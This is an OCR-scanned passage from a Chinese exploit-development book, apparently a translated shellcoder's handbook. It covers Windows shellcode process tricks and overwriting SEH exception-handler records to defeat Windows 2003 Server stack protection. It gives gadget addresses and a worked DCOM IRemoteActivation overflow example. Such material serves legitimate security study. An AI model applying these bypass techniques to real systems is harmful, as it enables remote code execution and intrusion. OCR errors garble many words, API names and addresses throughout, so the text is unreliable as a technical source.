接 字 是 从 进程 里 盗用 的 ， 或 者 不 是 用 wsasocket () 创建 的 ， 那 么 需要 用 匿名 管道 把 数据 向 前 /后 
做 一 些微 调 。 你 可 能 也 想 过 使 用 popen () ， 但 它 在 Win32 上 不 能 正常 工作 ， 除 非 你 重新 设计 它 。 
重新 设计 popen() 时 要 记 住 以 下 几 点 。 

(1) 调用 createProcessA 时 需要 把 继承 属性 设 为 1。 否 则 ， 当 你 把 管道 作为 标准 VO 传 给 
cmd.exe 时 ， 派 生 的 进程 将 不 能 访问 它 。 

(2) 在 读 的 时 候 ， 必 须 关 闭 父 进程 里 可 写 的 标准 输出 管道 或 读 进 程 的 管道 块 。 应 该 在 
CreateProcessAZ Jh. ReadFileZ Hi EB. 
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3) 为 了 写 入 标准 输入 ， 读 取 标 准 输出 ， 不 要 忘 了 用 puplicateHandle () 复 制 一 个 非 继承 的 
管道 句柄 。 为 了 让 它们 不 从 cma.exe 继 承 ， 需 要 关闭 继承 句柄 。 

(4) 如 果 你 想 找 cmq .exe， 使 用 GetEnvironmentVariable ("COMSPEC") 。 

(5) 可 以 在 createProcessA 里 设置 sw_HIDE 属 性 ， 这 将 使 每 次 运行 命令 时 不 弹出 窗口 。 还 需 
要 设置 STARTF_USESTDHANDLES 和 STARTF_USESSHOWWINDOWS 标 记 。 

有 了 以 上 几 点 ， 你 会 发 现 写 可 以 运行 的 popen () 其 实 也 很 简单 。 


7.5 为 什么 不 应 该 在 Windows 上 弹出 shell 


Windows 的 继承 性 问题 对 UNIX 程 序 员 来 说 ， 早 已 是 见怪 不 怪 的 麻烦 了 。 事 实 上 ， 大 多 数 
Windows 程 序 员 也 搞 不 清 继承 性 的 原理 ， 其 中 包括 微软 公司 自己 的 程序 员 。Windows 的 继承 性 和 

访问 令 牌 会 给 破解 发 现 者 带 来 很 多 麻烦 。 例 如 ，cma.exe 不 提供 传输 文件 的 功能 ， 而 自 定 义 的 
shellcode 却 可 以 轻松 做 到 。 另 外 ， 你 可 能 会 放弃 访问 全 部 Win32 API， 即 使 它 提供 了 比 默认 Win32 
shell 更 多 的 功能 。 你 也 可 能 会 用 进程 的 主 令 牌 替换 当前 线程 的 令 牌 。 在 某 些 情况 下 ， 主 令 牌 是 
LOCAL/SYSTEM; 在 其 他 情况 下 是 IWAN 或 TUSR， 或 者 其 他 权限 较 低 的 用 户 。 

当 你 用 自己 的 shellcode 传 输 文件 然后 执行 它 时 ， 有 些 东 西 可 能 会 从 中 作 梗 。 你 可 能 会 看 到 派 
生 的 进程 不 能 读 取 并 执行 它 自身 ， 它 可 能 以 完全 不 同 的 用 户 身份 来 运行 ， 而 不 是 你 预期 的 那样 。 
因此 ， 在 原 进 程 里 写 一 个 服务 ， 让 你 可 以 访问 所 需要 的 API。 这 样 的 方法 可 以 支持 其 他 用 户 的 线 
程 令 牌 ， 例 如 ， 可 以 作为 其 他 用 户 进行 读 写 操 作 。 谁 知道 那些 被 标 为 非 继 承 的 当前 进程 的 资源 是 
否 可 用 了 呢 ? 

如 果 你 曾经 想 用 你 模仿 的 用 户 派生 进程 ， 就 必须 勇敢 面 对 createProcessAsUser()， 并 使 
用 Windows 特 权 、 主 令 牌 和 一 些 Win32 小 技巧 。 用 Sysinternals (http://www.microsoft.com/technet/ 
sysinternals/) 上 的 工具 (尤其 是 Process Explorer) 分 析 令 牌 问题 。“ 为 什么 Windows shellcode 总 不 
按 我 的 意愿 运行 呢 ? ” 毫 无 疑问 ， 答 案 在 于 令 牌 特 性 。 


7.6 小 结 


本 章 介绍 了 堆 溢 出 的 初级 、 进 阶 、 高 级 三 个 阶段 。 堆 洪 出 比 栈 溢 出 要 难 很 多 ,为 了 有 效 地 把 
两 者 结合 起 来 ， 需 要 深入 理解 系统 的 内 部 运作 机 理 。 如 果 你 的 首次 尝试 没有 成 功 ， 不 要 灰心 ， 黑 
客 入 侵 本 来 就 是 反复 试验 、 不 断 摸索 的 过 程 。 

如 果 你 希望 提高 Windows shellcode 的 编写 技能 ， 建 议 你 通过 网 络 发 送 DLL， 并 把 它 连接 到 运 
行 的 进程 中 〈 当 然 ， 不 需要 写 到 磁盘 上 ); 或 者 动态 创建 shellcode 并 把 它 注入 正在 运行 的 进程 ， 
然后 与 所 需 的 函数 指针 连接 起 来 。 
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S| 学习 本 章 内 容 ， 你 需要 熟悉 Windows NT 或 更 新 版 本 的 Windows 操 作 系统 ， 并 且 知 道 如 

VJ 何 破 解 Windows 系 统 上 的 缓冲 区 溢出 。 本 章 重 点 介绍 Windows 溢 出 的 高 级 部 分 ， 比 如 

说 挫败 Windows 2003 Server 内 建 的 栈 保护 机 制 和 深入 理解 堆 溢 出 等 。 在 学 习 本 章 之 前 ， 你 应 该 熟 

悉 诸 如 TEB (Thread Environment Block， 线 程 环境 块 )、PEB、 进 程 内 存 布 局 、 映 像 文件 、PE 文 
件 头 等 内 容 。 如 果 对 这 些 概 念 还 有 稍 许 疑 问 ， 建 议 你 先 把 它们 弄 清楚 后 再 开始 学 习 本 章 。 

在 本 章 的 学 习 过 程 中 会 用 到 一 些 工 具 ， 如 微软 公司 的 Visual Studio 6， 特 别 是 用 于 调试 的 
MSDEV、 命 令 行 编译 程序 cl 和 dumpbin。dumpbin 是 一 个 优秀 的 命令 行 工具 ， 它 可 以 把 二 进 制 文 
件 中 的 信息 转 储 出 来 ， 如 导入 表 、 导 出 表 、 段 信息 及 汇编 指令 等 。 只 要 你 想到 的 ，dumpbin 几 乎 
都 可 以 做 到 。 喜 欢 GUI 的 人 可 以 享用 优秀 的 反 汇 编 工 具 Datarescue 的 IDAPro。 有 人 喜欢 Intel 句 法 ， 
有 人 喜欢 AT&T 人 句法， 我 的 建议 是 : 选择 合适 的 ， 不 要 受 他 人 左右 。 

8.1 栈 缓 冲 区 溢出 

又 见 到 经 典 的 栈 缓冲 区 溢出 了 。 它 已 经 出 现 很 长 时 间 了 【几乎 是 伴随 着 计算 机 的 出 现 而 出 现 
的 )， 可 能 还 将 继续 出 现 ， 它 已 经 成 为 漏洞 猎手 或 破解 者 的 主要 目标 。 每 当 在 新 软件 里 发 现 栈 缓 
冲 区 洲 出 时 ,我 们 都 有 些 活 笑 不 得 。 网 上 有 许多 文档 有 助 于 加 深 理 解 本 节 所 介绍 的 内 容 ， 本 书 的 
前 儿 章 也 涉及 了 一 些 ， 在 此 就 不 再 重复 那些 内 容 了 。 

破解 栈 缓冲 区 溢出 的 原理 是 , 用 代码 地 址 覆盖 保存 的 返回 地 址 (代码 地 址 指向 可 将 进程 的 执 
行路 径 返 给 用 户 提 供 的 缓存 区 的 指令 或 代码 段 )。 在 深入 学 习 栈 缓冲 区 溢出 之 前 ， 我 们 先 看 一 下 
基于 帧 的 异常 处 理 程序 , 然后 了 解 栈 上 可 改写 的 注册 异常 结构 ， 考 虑 怎样 通过 它 使 Windows 2003 
Server 内 建 的 栈 保护 机 制 失效 。 


8.2 ”基于 帧 的 异常 处 理 程序 


异常 处 理 程序 用 于 处 理 程序 运行 过 程 中 出 现 的 异常 问题 ， 如 访问 违例 或 除 以 0 等 。 基 于 帧 的 
异常 处 理 程序 与 特定 的 过 程 相 关 ， 每 个 过 程 在 初始 化 时 都 会 创建 一 个 新 栈 帧 。 基 于 帧 的 异常 处 理 
程序 的 相关 信息 保存 在 栈 的 EXCEPTION_REGISTRATION 结 构 里 。 这 个 结构 包括 两 个 元 素 ; 第 一 个 
元 素 是 指向 下 一 个 EXCEPTION_REGISTRATION 结 构 的 指针 , 第 二 个 元 素 是 指向 异常 处 理 程序 的 指 
针 。 这 样 一 来 ， 基 于 帧 的 异常 处 理 程序 就 相互 连接 成 一 个 链表 ， 如 图 8-1 所 示 。 
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指向 下 一 个 E_R 结 构 的 指针 


指向 异常 处 理 程序 的 指针 








指向 下 一 个 E_R 结 构 的 指针 


指向 异常 处 理 程序 的 指针 


指向 下 一 个 E R 结 构 的 指针 
指向 异常 处 理 程序 的 指针 





图 8-1 ”使 用 中 的 帧 异常 处 理 程序 


Win32 进 程 里 的 每 个 线程 在 创建 之 初 都 至 少 有 一 个 异常 处 理 程序 。 每 个 线程 的 第 一 个 
EXCEPTION_REGISTRATION 结 构 的 地 址 可 以 在 环境 块 〈 用 汇编 格式 表示 是 Fs: [01) 中 找到 。 异 常 
发 生 后 , 系统 将 遍历 整个 异常 处 理 程序 链表 ,直至 找到 恰当 的 处 理 程序 (能 成 功 处 理 异常 ) 为 止 。 
C 语 言 用 try 和 except 捕 获 栈 异常 。 


#include <stdio.h> 

#include <windows.h> 

dword MyExceptionHandler (void) 

{ 
printf("In exception handler...."); 
ExitProcess(1); 
return 0; 


} 
int main() 
{ 
asm 
// Cause an exception 


xor eax, eax 
call eax 
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H 
. except (MyExceptionHandler()) 
{ 
printf ("oops..."); 
} 
return 0; 


} 

在 上 面 的 代码 中 ， 用 try 执 行 一 段 代码 ， 当 异常 发 生 时 ， 直 接 执行 MyExceptionHandler 函 
数 。 我 们 可 以 试 着 把 EAX 设 为 0x00000000， 然 后 调用 EAX， 这 时 会 发 生 异 常 ， 系 统 将 执行 异常 处 
理 程序 。 

当 改 写 栈 缓 冲 区 (也 就 是 改写 函数 的 返回 地 址 ) 时 ， 也 可 能 会 歌 及 缓冲 区 里 其 他 的 变量 ， 
这 将 使 破解 过 程 变 得 更 加 复杂 。 例 如 ， 假 设 函数 以 一 个 结构 为 参考 点 ，EAX 寄 存 器 指向 结构 开 
头 ， 函 数 在 结构 偏 移 处 的 变量 被 保存 的 返回 地 址 改写 。 如 果 把 这 个 变量 移 到 ESI， 并 执行 如 下 
HS: 


mov dword ptr[eax+esi], edx 
因为 用 于 溢出 的 数据 中 不 能 有 NULL 字 节 ， 所 以 当 洲 出 这 个 变量 时 ， 需 要 确保 使 用 可 写 的 值 ( 如 
EAX+ESI)， 否 则 进程 将 引起 访问 违例 。 我 们 应 该 尽量 避免 这 种 情形 出 现 。 因 为 如 果 发 生 访问 违 
例 ， 系 统 将 执行 异常 处 理 程序 ， 线 程 或 进程 可 能 会 被 终止 ， 我 们 将 丧失 运行 代码 的 机 会 。 即 使 现 
在 修复 了 这 个 问题 ，Eax+ESI 可 写 了 ， 但 是 在 脆弱 函数 返回 前 ， 可 能 还 会 遇 到 类 似 的 问题 需要 修 
复 ， 而 在 某 些 情况 下 ， 有 些 问 题 儿 乎 是 无 法 修复 的 。 现 在 ， 有 一 个 方法 可 以 帮助 规避 这 个 问题 ， 
那 就 是 改写 基于 帧 的 ExcEPTTON_REGISTRATION 结 构 ， 让 我 们 控制 指向 异常 处 理 程序 的 指针 。 当 
发 生 访 问 违 例 时 ， 我 们 可 以 控制 进程 的 执行 路 径 : 把 异常 处 理 程序 的 指针 设 为 指向 我 们 的 代码 ， 
从 而 返回 自己 的 缓冲 区 。 

在 这 种 情况 下 ， 做 些 什 么 才能 改写 指向 处 理 程序 的 指针 进而 执行 缓冲 区 中 的 代码 呢 ? 答案 
是 : 与 系统 平台 及 SP 有 关 。 在 没 打 补丁 的 Windows 2000 和 Windows XP 上 ，EBX 寄 存 器 指向 当前 的 
EXCEPTION_REGISTRATION 结 构 ， 也 就 是 指向 我 们 正 要 改写 的 结构 。 因 此 可 以 用 指向 jmp ebx 或 
call ebx 指 令 地 址 的 指针 ， 改 号 指向 真正 异常 处 理 程序 的 指针 。 这 样 ， 当 执行 “处 理 程 序 ” 时 ， 
会 执行 我 们 改写 的 EXCEPTION_REGISTRATION 结 构 。 我 们 需要 设置 指向 第 二 个 EXCEPTION_ 
REGISTRATION 结 构 的 指针 ， 使 它 指 向 发 现 jmp ebx 指令 地 址 之 前 的 短 jmp 地 址 。 当 改写 
EXCEPTION_REGISTRATION 结 构 时 ， 可 以 做 到 像 图 8-2 描 绘 的 那样 。 

然而 ， 在 Windows 2003. Windows XP SP1 或 更 新 版 本 的 系统 上 就 不 是 这 样 了 。EBX 不 再 指向 
EXCEPTION_REGISTRATION 结 构 。 实 际 上 ， 那 些 指 向 有 用 数据 的 寄存 器 都 和 自己 做 XOR 运 算 了 ， 
以 至 于 在 调用 处 理 程序 前 ， 它 们 已 被 设 为 0x00000000。 可 能 是 微软 公司 考虑 到 Code Rediff rh E 
使 用 这 样 的 方法 获取 IIS 控 制 的 ， 所 以 做 了 这 些 改变 。 下 面 是 相关 的 代码 (来 自 Windows XP 


Professional SP1). 
77F79B57 xor eax,eax 
77F79B59 xor ebx, ebx 


77F79B5B xor esi,esi 
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77F79B5D xor edi, edi 

77F79B5F push dword ptr [esp+20h] 
77F79B63 push dword ptr [esp+20h] 
77F79B67 push dword ptr [esp+20h] 
77F79B6B push dword ptr [esp+20h] 
77F79B6F push dword ptr [esp+20h] 
77F79B73 call 77F79B7E 

77F79B78 pop edi 

77F79B79 pop esi 

77F79B7A pop ebx 

77F79B7B ret 14h 

77F79B7E push ebp 

77F79B7F mov ebp,esp 

77F79B81 push dword ptr [ebp+0Ch] 
77F79B84 push edx 

77F79B85 push dword ptr fs:[0] 
77F79B8C mov dword ptr fs: [0], esp 
77F79B93 push dword ptr [ebp+14h] 
77F79B96 push dword ptr [ebp+10h] 
77F79B99 push dword ptr [ebp+0Ch]} 
77F79B9C push dword ptr [ebp+8] 
77F79B9F mov ecx,dword ptr [ebp+18h] 
77F79BA2 call ecx 


EBX 指 向 这 里 







指向 执行 ju ebx 代码 的 地 址 的 指 
真正 代码 开始 






图 8-2 ”改写 EXcEPTION_REGISTRATION 结 构 


从 0x77F79B57 开 始 ，EAX、EBX、ESI、EDI 寄 存 器 均 通 过 与 自身 做 XOR 运 算 被 设 为 0， 注 意 ， 
0x77F79873 处 的 call 指 令 一 直 执 行 到 0x77F79B7E。 在 0x77F79B9F 处 ，ECX 被 设 为 指向 异常 处 理 
程序 的 指针 ， 然 后 调用 ECX。 

即使 微软 公司 做 了 这 些 改变 , 攻击 者 仍 能 获得 控制 权 。 但 在 没有 任何 寄存 器 指向 用 户 提交 的 
数据 的 情况 下 ， 攻 击 者 需要 做 的 就 是 暴力 猜测 所 提交 的 数据 在 内 存 中 的 位 置 。 当 然 ， 上述 这 些 改 
变 有 助 于 减少 暴力 猜测 成 功 的 可 能 性 。 

真是 这 样 吗 ? 如 果 在 调用 异常 处 理 程序 之 后 立即 检查 栈 ， 会 看 到 : 
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ESP = Saved Return Address (0x77F79BA4) 
ESP + 4 = Pointer to type of exception (0xC0000005) 
ESP + 8 = Address of EXCEPTION_REGISTRATION structure 


用 包含 jmp ebx 或 cal1 ebx 指令 的 地 址 来 代替 改写 指向 异常 处 理 程序 的 指针 ， 我 们 所 要 做 
的 只 是 用 指向 一 段 执行 如 下 指令 的 代码 的 地 址 改写 它 : 


pop reg 
pop reg 
ret 


每 条 POP 指令 执行 后 EsP 减 4， 所 以 当 执行 RET 时 ，BESP? 正 好 指向 用 户 提 交 的 数据 。 记 住 ，RET 
取 走 栈 顶 的 地 址 (8sP)， 并 把 执行 流程 返回 那里 。 因 此 ， 攻 击 者 既 不 需要 指向 缓冲 区 的 指针 ， 也 
不 用 猜测 它 的 位 置 。 

Bæ. AH, BMRA HE? 别 急 ， 这 样 的 指令 很 多 ， 每 个 函数 的 尾部 
几乎 都 能 看 到 它 的 身影 。 每 个 函数 执行 后 的 整理 指令 里 一 般 都 会 包含 我 们 所 需要 的 指令 块 。 
具有 讽刺 意味 的 是 ，0x0x77F79B79 处 是 清除 所 有 寄存 器 的 指令 块 ， 但 也 是 我 们 能 找到 的 最 


好 的 位 置 。 
77F79B79 pop esi 
77F79B7A pop ebx 
77F79B7B ret 14h 


ret 14 实 际 上 没有 什么 影响 ， 它 只 是 把 EBsP 加 上 0x14 而 不 是 0x4。 这 些 指令 将 把 我 们 带 到 栈 
上 的 EXCEPTION_REGISTRATION 结 构 。 此 外 ， 指 向 下 一 个 EXCEPTION_REGISTRATION 结 构 的 指针 
值 将 被 设 为 指向 执行 短 jmp 和 两 条 NOP 指 令 的 代码 的 地 址 。 这 就 可 以 从 侧面 迁 回 进入 指向 pop、 
pop、ret 指 令 块 的 地 址 。 

每 一 个 Win32 进 程 或 线程 启动 时 ， 在 进程 或 线程 起 始 处 至 少 都 会 有 一 个 基于 帧 的 异常 处 理 程 
序 。 因 此 ， 当 尝试 破解 Windows 2003 Server 上 的 缓冲 区 溢出 时 ， 滥 用 基于 帧 的 处 理 程序 是 挫败 
Windows 2003 Server 上 新 建 的 栈 保护 机 制 的 一 种 方法 。 
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滥用 基于 帧 的 异常 处 理 是 绕 过 Windows 2003 栈 保护 的 通用 方法 (更 多 详情 参见 8.4 节 )。 
Windows 2003 Server 在 发 生 异 常 时 ， 会 首先 检查 用 于 处 理 异 常 的 程序 是 否 正确 。 微 软 公司 试图 用 
这 种 方法 阻止 帧 异常 处 理 程 序 信 息 被 改写 后 可 能 造成 的 栈 缓冲 区 溢出 , 并 希望 以 此 阻止 攻击 者 改 
写 指向 异常 处 理 程序 的 指针 并 调用 它 。 

系统 怎样 判断 处 理 程序 是 否 正 确 昵 ? 实施 检查 的 是 ntdl1.dl1 里 的 KiUserException- 
Dispatcher Mi. Ti, 这 个 函数 检查 应 该 指向 处 理 程序 的 指针 是 否 指向 了 栈 地 址 。 它 参考 FSs: [4] 
与 FS: [8] 之 间 的 从 高 到 低 的 栈 地 址 的 线程 信息 块 条 目 ， 如 果 处 理 程序 的 地 址 在 这 个 范围 之 内 ， 
这 个 函数 将 认为 有 问题 而 拒绝 调用 此 处 的 处 理 程序 。 所 以 , 攻击 者 不 能 直接 把 异常 处 理 程序 指 疝 
他 们 在 栈 上 的 缓冲 区 。 如 果 指 向 处 理 程 序 的 指针 不 是 栈 地 址 ， 这 个 函数 将 接着 检查 已 加 载 模块 的 
列表 ， 包 括 可 执行 映像 文件 和 DLL， 以 查看 处 理 程序 是 否 在 这 些 模块 的 地 址 范围 内 ， 令 人 奇怪 的 
是 ， 如 果 不 在 里 面 ， 系 统 会 认为 异常 处 理 程序 是 安全 的 而 调用 它 。 然 页， 如 果 地 址 在 已 加 载 模块 
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的 地 址 范围 内 ， 这 个 函数 将 接着 检查 已 注册 的 处 理 程序 列表 。 

系统 调用 RtltmageNtHeader 函 数 获得 指向 映像 文件 PE 头 部 的 指针 。 首 先 检查 PE 头 部 ， 如 果 
是 DLL 的 特征 字 节 0x04 而 不 是 0x5F， 那 么 这 个 模块 将 “不 被 允许 ”如 果 处 理 程序 在 这 个 模块 的 
地 址 范围 内 ， 将 不 会 被 调用 。 指 向 PE 头 部 的 指针 将 作为 参数 传 给 RtlImageDirectoryEntry- 
ToData 函 数 , 在 这 种 情况 下 , 感 兴趣 的 目录 是 Load Configuration Directory, RtlImageDirectory- 
EntryToData 函 数 返回 这 个 目录 的 地 址 和 长 度 。 如 果 模 块 没有 Load Configuration Directory, Rž 
将 返回 0， 停 止 进一步 检查 ， 调 用 处 理 程序 。 另 一 方面 ， 如 果 模 块 有 Load Configuration Directory， 
那么 检查 长 度 ， 如 果 这 个 目录 的 长 度 是 0 或 小 于 0x48， 停 止 进一步 检查 ， 调 用 处 理 程序 。 从 Load 
Configuration Directory 开 始 处 偏 移 0x40 字 节 的 地 方 是 一 个 指向 已 注册 处 理 程 序 的 RVA (Relative 
Virtual Address， 相 对 虚拟 地 址 ) 表 的 指针 。 如 果 这 个 指针 是 NoLrL， 停 止 进一步 检查 ， 调 用 处 理 
程序 。 从 Load Configuration Directory 开 始 处 偏 移 0x44 字 节 的 地 方 是 这 个 表 的 条 目 数 ， 如 果 条 目 数 
是 0， 停 止 进一步 检查 ， 调 用 处 理 程序 。 假 如 所 有 的 检查 都 成 功 ， 从 处 理 程序 的 地 址 减 去 已 装载 
模块 的 基地 址 ， 将 得 到 处 理 程序 的 RVA。 把 这 个 RVA 和 由 已 注册 处 理 程序 组 成 的 表 里 的 一 组 RVA 
做 比较 ， 如 果 发 现 匹 配 ， 调 用 处 理 程序 ， 如 果 发 现 〈 不 匹配 )， 拒 绝 调用 处 理 程序 。 

当 破 解 Windows 2003 Server 上 的 栈 缓冲 区 溢出 时 ， 我 们 有 以 下 儿 种 选择 来 改写 指向 异常 常 处 
理 程序 的 指针 。 

(1) 滥用 已 有 的 处 理 程序 ， 返 回 到 缓冲 区 。 

(2) 在 和 模块 无 关 的 地 址 里 找到 一 段 代 码 ， 返 回 缓冲 区 。 

G) 在 没有 Load Configuration Directory 模 块 的 地 址 空间 里 找到 一 段 代 码 。 

下 面 通过 DCOM IRemoteActivation 缓 冲 区 溢出 介绍 这 些 选 择 。 


8.3.1 混用 已 有 的 处 理 程序 

ntqdll1.d1ll 里 的 0x77F45A34 地 址 指向 一 个 已 注册 的 异常 处 理 程序 。 如 果 检 查 这 个 处 理 程序 
的 代码 ， 将 发 现 可 以 滥用 这 个 处 理 程 序 运行 我 们 的 代码 。 指 向 EXCEPTION_REGISTRATTON 结 构 的 
指针 位 于 EBP+0Ch。 


77F45A3F mov ebx,dword ptr [ebp+0Ch] 


77F45A61 mov esi,dword ptr [ebx+0Ch] 
77F45A64 mov edi,dword ptr [ebx+8] 


77F45A75 lea ecx, [esi+esi*2] 
77F45A78 mov eax,dword ptr [edi+tecx*4+4] 


77F45A8F call eax 

指向 EXCcEPTION_REGISTRATION 结 构 的 指针 被 移 到 EBX， 指 向 0ox0c 十 EBX 的 双 字 值 被 移 到 
ESI。 因 为 已 经 游 出 了 EXCEPTION_REGISTRATION 结 构 并 越过 了 它 ， 所 以 我 们 可 以 完全 控制 这 个 
双 字 ， 从 而 “拥有 ”ESI。 接 下 来 ， 指 向 0x08 十 EBX 的 双 字 值 被 移 到 EDI， 我 们 也 能 控制 它 了 。 
ESI+ESI*2〔 等 于 ESI*3) 的 有 效 地 址 被 载 入 ECxX。 因 为 已 经 拥有 ESI， 所 以 ， 我 们 能 决定 进入 到 
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ECX 的 值 。 我 们 所 控制 的 指向 EDI 的 地 址 加 上 Ecx*4+4， 被 移 到 EAX， 然 后 调用 EAX。 因 为 可 以 - 


完全 控制 进入 BDI 和 ECcX〔〈 通 过 ESsT) 的 值 ， 所 以 我 们 就 能 控制 进入 EAX 的 值 ， 也 就 可 以 引导 进 
程 执行 我 们 的 代码 。 只 不 过 要 想 找 出 保存 指向 代码 指针 的 地 址 还 是 有 点 难度 的 。 我 们 需要 确保 
EDI+ECX*4+4 和 这 个 地 址 匹配 ， 以 保证 指向 代码 的 指针 被 移 到 EAX， 然 后 调用 Eax。 第 一 次 破 
解 svchost 时 ，TEB 的 位 置 与 栈 的 位 置 通常 是 一 致 的 。 当 然 ， 在 繁忙 的 服务 器 上 可 能 不 一 致 。 假 
设 一 致 的 话 ， 我 们 可 以 在 TEB+0 COx7FFDBOOO) 处 发 现 指 向 EXCEPTION_REGISTRATION 结 
构 的 指针 ， 把 这 个 指针 作为 寻找 指向 代码 的 指针 的 基 址 。 但 异常 发 生 时 ， 在 调用 异常 处 理 程序 
之 前 ， 这 个 指针 会 被 更 新 并 修改 ， 因 此 不 能 使 用 这 个 方法 。 然 而 ， 在 TEB+0 指 向 的 EXCEPTION_ 
REGISTRATION 结 构 里 ， 在 地 址 0x005CF3F0 处 有 一 个 指向 EXCEPTION_REGISTRATION 结 构 的 指 
针 ， 在 第 一 次 运行 破解 时 ， 这 个 指针 和 栈 的 位 置 通常 是 一 致 的 ， 因 此 可 以 使 用 这 个 指针 。 在 地 址 
0x005CF3E4 处 ， 有 另外 一 个 指针 也 指向 EXCEPTION_REGISTRATION 结 构 。 假 设 我 们 用 后 一 个 地 
址 ， 如 果 设 置 ExcEPTION_REGISTRATION 结 构 越 过 0xoc 的 值 到 0x40001554 〈 这 将 被 移 到 EsT)， 

并 且 越 过 0x08 的 值 到 0x005BF3F0 (这 将 被 移 到 EpI)， 经 过 一 系列 的 乘 、 加 运算 后 ， 得 到 
0x005CF3E4。0x005CF3E4 指 向 的 地 址 被 移 到 EAXx， 然 后 调用 EAX。 在 调用 EAX 时 ， 使 EXCEPTION_ 
REGISTRATION 结 构 在 这 个 指针 指向 的 下 一 个 EXCEPTION_REGISTRATION 结 构 里 。 如 果 把 代码 放 
在 这 里 ， 从 当前 位 置 短 跳 转 14B， 那 我 们 将 跳 过 无 用 的 数据 直接 执行 到 这 里 。 

我 们 在 4 台 Windows 2003 服 务 器 系统 上 测试 了 一 下 (3 台 是 Windows 2003 企 业 版 ， 一 台 是 标 
准 版 )， 所 有 的 破解 都 成 功 了 。 然 而 ， 需 要 明白 的 是 ， 这 是 第 一 次 在 系统 上 运行 破解 ， 否 则 失败 
的 可 能 性 还 是 比较 大 的 。 另外， 我 们 推测 这 个 异常 处 理 程 序 是 向 量化 处 理 程序 ， 而 不 是 帧 处 理 程 
序 ， 这 也 是 为 什么 可 以 以 这 种 方式 滥用 它 的 原因 。 

除 此 之 外 , 我 们 也 可 使 用 其 他 的 包含 同样 异常 处 理 程序 的 模块 。 在 地 址 空间 内 已 注册 的 其 他 
异常 处 理 程序 通常 转向 由 msvcrt .a11 或 类 似 文 件 导 出 的 __except_handler3。 


8.3.2 ”在 与 模块 不 相关 的 地 址 里 寻找 代码 段 ， 从 而 返回 缓冲 区 
在 其 他 版 本 的 Windows 的 ESP+8 处 ， 可 以 看 到 一 个 指向 EXCEPTION_REGISTRATION 结 构 的 指 
针 ， 因 此 ， 可 以 在 与 任何 已 加 载 模 块 不 相关 的 地 址 里 找到 以 下 指令 块 : 


pop reg 
pop reg 
ret 


AFT. fEWindows 2003 Server 企 业 版 里 运行 的 每 个 进程 的 0x7FFC0AC5 处 ， 我 们 都 能 找到 这 样 
的 指令 块 。 因 为 这 个 地 址 和 任何 模块 都 没有 关联 ， 所 以 系统 在 检查 这 个 “处 理 程序 ”时 会 认为 它 
是 安全 的 ， 从 而 允许 它 被 调用 。 不 过 ， 仍 然 存 在 一 个 问题 。 尽 管 在 不 同 计算 机 上 运行 的 Windows 
标准 版 在 这 个 地 址 附近 都 有 pop、pop、ret 指 令 块 ， 但 它们 所 处 的 位 置 不 尽 相 同 。 既 然 不 能 确定 
pop、pop、ret 指 令 块 的 位 置 ， 还 坚持 使 用 它 就 不 太 合 理 了 。 与 其 寻找 pop、pop、ret， 还 不 如 
dk: 


call dword ptr[esp+8] 
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或 者 ， 选 择 脆 弱 进 程 地 址 空间 里 的 : 

jmp dword ptr[esp+8] 

如 果 在 适当 的 地 址 没有 找到 这 样 的 指令 ， 也 不 要 灰心 ， 我 们 可 以 在 ESP 和 EBP 周 围 找 到 许多 
分 散 的 、 指 向 EXCEPTION_REGISTRATION 结 构 的 指针 。 下 面 是 我 们 找到 的 、 指 向 我 们 结构 的 指针 
的 位 置 : 

espt+8 

esp+14 

esp+1c 

esp-2C 

esp+44 

esp+50 


ebp+0c 


可 以 通过 call 或 jmp 使 用 它们 。 如 果 检 查 svchost 的 地 址 空间 ， 在 0x001B0B0B 地 址 会 看 到 以 
下 代码 : 

call dword ptr[ebp+0x30] 
在 EBP+30 处 有 一 个 指向 EXcEPTION_REGISTRATION 结 构 的 指针 。 这 个 地 址 和 任何 模块 无 关 , 而 且 ， 
几乎 每 个 运行 在 Windows 2003 Server (在 Windows XP 上 也 有 许多 的 进程 》 上 的 进程 ， 在 这 个 地 
址 都 有 同样 的 字 节 ， 但 在 0x001C0B0B 处 没有 这 样 的 “指令 ”。 用 0x001B0B0B 改 写 指向 异常 处 理 
程序 的 指针 ， 我 们 可 以 返回 缓冲 区 并 执行 代码 。 在 4 台 不 同 的 Windows 2003 Server 上 检查 
0x001B0B0B 地 址 处 的 call dword ptr [ebp+0x30] 指 令 ， 发 现 它们 都 有 “正确 的 字 节 ”。 所 以 ， 
用 这 个 方法 破解 Windows 2003 Server 上 的 漏洞 似乎 更 好 一 些 。 


8.3.3 在 没有 Load Configuration Directory 的 模块 的 地 址 空间 里 寻找 代码 段 


可 执行 映像 文件 (svchost.exe) 本 身 没 有 Load Configuration Directory。 如 果 KiUserExcep- 
tionDispatcher () 代码 里 没 有 处 理 NULL 指 针 异 常 ，svchost .exe 将 可 以 工作 。RtlImage- 
NtHeader () 函数 返回 一 个 指向 给 定 映 像 文件 PE 头 部 的 指针 ， 但 对 于 svchost， 它 返回 0。 不 过 ， 
在 KiUserExceptionDispatcher() 里 会 直接 使 用 返回 的 指针 ， 而 不 会 检查 返回 的 指针 是 否 为 


NULL. 


call RtlImageNtHeader 
test byte ptr [eax+5Fh], 4 
jnz 0x77F68A27 


像 上 面 那样 ， 如 果 引 起 访问 违例 ,所 有 的 努力 都 将 化 为 泡影 ， 所 以 不 能 用 svchost .exe 里 的 
代码 。comres .dl11 里 面 虽 然 没 有 Load Configuration Directory， 但 PE 头 文件 的 DLL 的 特征 字 节 是 
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0x0400， 因 此 在 调用 RtlImageNtHeader 测 试 之 后 会 失败 ， 跳 转 到 0x77F68a27， 远 离 我 们 的 处 
理 程 序 。 事 实 上 ， 如 果 你 遍历 地 址 空间 里 的 所 有 模块 ， 就 会 发 现 它们 都 不 符合 条 件 。 许 多 有 Load 
Configuration Directory 的 已 注册 处 理 程序 的 模块 可 以 通过 同样 的 测试 。 因 此 ， 假 若 这 样 的 话 ， 这 
个 选择 也 没什么 用 处 。 

因为 在 大 多 数 的 时 候 ， 试 图 向 越过 栈 尾 的 地 方 写 数据 时 会 引起 异常 ， 所 以 当 溢 出 缓冲 区 时 ， 
可 以 用 这 个 方法 绕 过 Windows 2003 Server 的 栈 保护 机 制 。 昌 然 现在 这 样 说 没 错 ， 但 Windows 2003 
Server 是 一 个 全 新 的 操作 系统 ， 而 且 ， 微 软 公司 承诺 把 它 做 成 一 个 更 安全 的 操作 系统 ， 并 向 我 们 
描绘 任何 攻击 对 它 基本 上 都 不 会 造成 影响 。 因 此 ， 不 用 怀疑 ， 我 们 当前 破解 的 漏洞 ， 即 使 不 会 被 
